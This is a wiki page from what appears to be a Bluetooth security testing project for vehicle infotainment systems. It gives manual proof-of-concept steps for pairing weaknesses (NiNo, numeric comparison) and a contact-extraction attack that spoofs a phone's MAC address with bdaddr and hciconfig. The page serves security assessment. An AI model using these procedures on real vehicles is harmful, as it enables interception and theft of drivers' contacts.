Skip to content

Manual Exploits

sgxgsx edited this page Aug 9, 2024 · 2 revisions

Always pairable

This check could be used to assess the severity of the attacks. If the target device is pairable even if the user does not navigate to the pairing/discovery menu then such a device has a higher exposure to the threats.

It should be noted that previous research showed that Bluetooth MAC addresses could be passively collected with a high probability.

To check the target device:

  • obtain a MAC address of a target
  • do not navigate to the pairing/discovery menu
  • try to connect to the target using bluetoothctl and hcitool

Only the vehicle can initiate a connection

This check applies mainly to the In-vehicle-infotainment systems (IVI). IVI systems generally allow the phone to connect to them but lack the capability of connecting back. There are also such IVI systems that allow the connection to be initiated in both ways. The most secure one is a connection initiated by the IVI system. It should be also noted that defences for the attacks might be implemented for a connection initiated by the phone but the same defences might be lacking when the connection is initiated by the IVI system.

Fast reboot

This is a check whether or not it is possible to reboot the target device. Some devices like In-Vehicle-Infotainment systems mainly do not allow to be rebooted unless one switches off and closes the vehicle for 10-20 minutes.

The result could be additionally used to assess the severity of Denial of Service exploits.

Insecure Numeric Comparison Implementation

Summary:

The IVI system does not properly implement the Numeric Comparison authentication protocol as in the core specification of the Bluetooth which makes a link to be non-authenticated and thus vulnerable to the NiNo, Method Confusion and custom MitM attacks.

Requirements:

Ubuntu Laptop/PC

PoC steps:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: scan on
  4. Command: connect IVI_MAC_ADDRESS_
  5. Look closely at the IVI screen where a user doesn't have control over accepting or declining the connection. * Another variant would be that the IVI doesn't show a code first, but only simple Yes/No buttons and the name of the device which can be forged, and once the connection is established it gives a possibility to disconnect.
  6. This small mistake breaks all the guarantees of the BT pairing protocol and makes it vulnerable to MitM attacks.

Vehicular NiNo

Summary:

The vehicle allows connections to a device with no input or output capabilities. According to the specification if one of the devices has a NoInputNoOutput capability, then the pairing mode used is named Just Works and such a link should be considered unauthenticated and vulnerable to MitM attacks. This results in an adjacent adversary being able to execute a practical attack and establish a MitM position.

Important distinction: In this case, the vehicle doesn't allow NoInputNoOutput devices to initiate a connection to the IVI, but fails to check the same for a connection initiated by the IVI. The attack window is smaller than in a usual NiNo attack but still exists.

Note on NiNo devices in the vehicular domain: In the vehicular domain, the usage of NiNo devices such as headphones is not frequent if legal at all while driving. When it comes to the smartphone domain a connection to such devices is considered a feature and a usability trade-off to enable wireless headphones for example. As such a use-case is not present in the vehicular domain then it's better to disallow connection from such devices, which many of the manufacturers do already.

Requirements:

Ubuntu Laptop/PC

PoC steps:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: agent off
  4. Command: agent NoInputNoOutput
  5. Command: discoverable on
  6. Command: pairable on
  7. Command: scan on
  8. Go to a BT menu in the IVI, and start looking for devices
  9. Find your laptop/PC and initiate a connection from the vehicle to the laptop/PC
  10. Accept the connection request in bluetoothctl shell by typing yes.
  11. If the connection is established - the IVI is vulnerable.

If you don't know how to get the MAC address:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: scan on
  4. Command: discoverable on
  5. Then from the IVI system find your laptop/PC MAC address or name and connect it. Then you can use that MAC address in the future steps.

Contact Extractor attack

Summary:

The vehicle IVI system allows a physical adversary to extract previously shared through Bluetooth contacts. This happens due to incorrect handling access control for newly created BT sessions for already known MAC addresses.

The exploit is not publicly available

Requirements:

Ubuntu Laptop/PC Android/iPhone phone (not rooted) with test contacts. The contacts should be in international format for ease of testing.

PoC steps:

  1. Take an Android/iPhone phone and connect it to the IVI system
  2. Allow sharing the contacts, and share them.
  3. Go to the call/contacts app of the IVI system and scroll through the contacts.
  4. Note the MAC address of the phone (an adversary can do it passively)
  5. Switch off the Bluetooth on the phone.
  6. Execute the following commands by changing PHONE_MAC_ADDRESS to the MAC address of the phone
sudo bdaddr -i hci0 PHONE_MAC_ADDRESS
sudo hciconfig hci0 resetw
sudo systemctl restart bluetooth.service
  1. Note the second MAC address in the output of the tool (it is the MAC address of the laptop/PC) in the future it'll be referred to as LAPTOP_MAC_ADDRESS
  2. Now execute bluetoothctl command
  3. In the bluetoothctl shell execute:
  4. Command: scan on
  5. Command: connect IVI_MAC_ADDRESS
  6. Accept a connection on the IVI screen
  7. Then on the IVI screen go to the contacts app of the IVI
  8. Use the search button and search for + (you need to look for the start of the phone number)
  9. Alternatively go to the dial pad app and search for + (you need to look for the start of the phone number)
  10. Now you should find contacts shared by phone.

If you don't know how to get the MAC address:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: scan on
  4. Command: discoverable on
  5. Then from the IVI system find your laptop/PC MAC address or name and connect it. Then you can use that MAC address in the future steps.